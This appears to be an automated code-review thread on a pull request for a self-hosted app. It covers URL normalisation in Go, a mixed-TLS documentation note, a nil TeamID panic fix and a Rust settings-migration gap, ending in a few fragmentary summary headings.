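// concatenating strings (which can yield https://https://...).
// Note: the prefix check is the same heuristic as the review's suggestion;
// a host that merely starts with "http" (e.g. "httpserver.com") would
// slip past it unprefixed.
func loginURL(base string) (string, error) {
	if !strings.HasPrefix(base, "http") {
		base = "https://" + base
	}
	u, err := url.Parse(base)
	if err != nil {
		return "", err
	}
	u.Path = "/login-app"
	return u.String(), nil
}

func main() {
	// Both a bare host and a full URL normalize to the same result.
	for _, b := range []string{"myserver.com", "https://myserver.com"} {
		s, _ := loginURL(b)
		fmt.Println(s) // prints: https://myserver.com/login-app
	}
}
```

With naive concatenation, the second input would have produced the broken `https://https://myserver.com/login-app`; parsing through the URL type makes the scheme idempotent.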
🧹 Nitpick comments (1)
docs/src/content/docs/open-source/self-hosting.md (1)

Lines 118-127: ⚡ Quick win: clarify the mixed TLS setup for local development.

The local development configuration enables `USE_TLS=true` for the backend (serving HTTPS on port 1926) but uses `ws://localhost:7880` (non-TLS) for LiveKit. This creates a mixed security setup where an HTTPS page would connect to a WS endpoint. While localhost is often exempt from mixed-content blocking in modern browsers, this could cause WebRTC connection issues in some scenarios. Consider documenting this as a potential gotcha or verifying that this configuration works reliably.

📝 Suggested documentation addition

Add a note after line 127:

> **Note:** This setup uses HTTPS for the backend but WS (non-TLS) for LiveKit. Localhost is typically exempt from mixed-content restrictions, but if you encounter WebRTC connection issues, try using `USE_TLS=false` for the backend or configure TLS for LiveKit as well.

🤖 Prompt for AI Agents

In `@docs/src/content/docs/open-source/self-hosting.md` around lines 118-127: add a short note clarifying the mixed TLS setup. Explain that `USE_TLS=true` enables HTTPS for the backend (port 1926) while `LIVEKIT_SERVER_URL` is set to `ws://localhost:7880` (non-TLS), which can create mixed-content or WebRTC issues; suggest either setting `USE_TLS=false` for local testing or configuring TLS for LiveKit (referencing `livekit.dev.yaml`) as troubleshooting steps, and place this note immediately after the `.env` example.
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 83a7532a-46e9-44b5-a156-5de43d501148
📒 Files selected for processing (3)
- docs/src/content/docs/features/settings.mdx
- docs/src/content/docs/open-source/self-hosting.md
- selfhost/compose.yml
✅ Files skipped from review due to trivial changes (1)
- docs/src/content/docs/features/settings.mdx
🚧 Files skipped from review as they are similar to previous changes (1)
- selfhost/compose.yml
♻️ Duplicate comments (2)
backend/internal/models/user.go (1)

Lines 277-282: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win: nil `user.TeamID` still panics on the Stripe-enabled path.

Previously flagged in an earlier review and not yet addressed in this revision: when `stripeEnabled == true`, control falls through to line 282 where `*user.TeamID` is dereferenced unconditionally (and again at line 291). `AuthHandler.User` in `handlers.go` calls `GetUserWithSubscription` directly without the nil pre-check that `checkUserHasAccess` performs in `utils.go`, so a `ManualSignUp` account with `TeamID == nil` will panic here on cloud deployments.

🛡️ Proposed fix: guard nil TeamID immediately after the stripeEnabled bypass

```diff
 func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) {
 	if !stripeEnabled {
 		return &UserWithSubscription{User: *user, IsPro: true}, nil
 	}
+
+	if user.TeamID == nil {
+		return &UserWithSubscription{User: *user, IsPro: false}, nil
+	}

 	team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID)))
```

🤖 Prompt for AI Agents

In `@backend/internal/models/user.go` around lines 277-282: `GetUserWithSubscription` currently dereferences `user.TeamID` when `stripeEnabled` is true, which panics for `ManualSignUp` users. Add an immediate nil check after the `stripeEnabled` bypass (e.g., `if user.TeamID == nil`) and handle it instead of dereferencing: return a safe `UserWithSubscription` (or an error) without accessing `*user.TeamID`, so callers like `AuthHandler.User` won't crash, mirroring the access-check behavior expected by `checkUserHasAccess`.

tauri/src-tauri/src/app_state.rs (1)

Line 12: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win: migration gap for existing `hopp_server_url` top-level values is still unresolved.

Users who previously persisted a custom backend URL in an older `app_state.json` (where `hopp_server_url` lived at the `AppStateInternal` top level) will silently lose that value on upgrade. `serde_json::from_str::<AppStateInternal>` ignores unknown fields by default, so the old top-level key is dropped with no migration path into `user_settings.hopp_server_url`.

The `AppState::new()` migration block (around line 210) needs to temporarily accept the old field and promote it into `UserSettings` for one release cycle, similar to how the `OldAppStateInternal` fallback already handles the JWT migration. A minimal approach:

🔧 Suggested migration sketch

```diff
+// Temporary migration struct — drop after one release
+#[derive(Debug, Deserialize)]
+struct AppStateInternalV1 {
+    #[serde(flatten)]
+    inner: AppStateInternal,
+    hopp_server_url: Option<String>,
+}
```

Then in `AppState::new()`, deserialize into `AppStateInternalV1` first, and if `inner.user_settings.hopp_server_url` is `None` and `hopp_server_url` is `Some`, populate it before constructing `AppState`.

🤖 Prompt for AI Agents

In `@tauri/src-tauri/src/app_state.rs` at line 12: add a short-lived migration path to preserve top-level `hopp_server_url`. Introduce an intermediary struct (e.g., `AppStateInternalV1`) mirroring `AppStateInternal` but with a `hopp_server_url: Option<String>` field; in `AppState::new()` first deserialize into `AppStateInternalV1`, and if `inner.user_settings.hopp_server_url` is `None` and `hopp_server_url` is `Some`, copy that value into `inner.user_settings.hopp_server_url` before constructing the final `AppState`. Keep this code temporary and remove the `AppStateInternalV1` handling in the next release.
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: b1bbd1e6-439b-4ac6-ad84-cb452fc7b1ab
📒 Files selected for processing (2)
- backend/internal/models/user.go
- tauri/src-tauri/src/app_state.rs
- With settings entry.
- With self-hosting instructions.

What it doesn't handle:

Summary by CodeRabbit

- New Features
- Documentation
- Chores
- Behavior